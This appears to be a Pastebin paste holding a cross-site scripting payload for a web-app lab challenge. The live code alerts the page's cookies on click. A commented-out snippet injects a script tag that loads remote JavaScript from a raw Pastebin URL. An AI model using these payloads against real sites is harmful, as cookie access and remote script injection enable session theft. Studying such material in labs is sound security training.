n0va_sa

JFP 9 [external JS]

Sep 22nd, 2017
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* .com/lab/webapp/jfp/9
  2. // loading Script //
  3. var sc = document.createElement('script');
  4. sc.src = 'https://pastebin.com/raw/1xES3u5d';
  5. document.head.appendChild(sc);
  6. */
  7.  
  8. function raw(){
  9. alert(document.cookie);
  10. }
  11. (window.addEventListener('click',function(){
  12. raw();
  13. }))()
Add Comment
Please, Sign In to add comment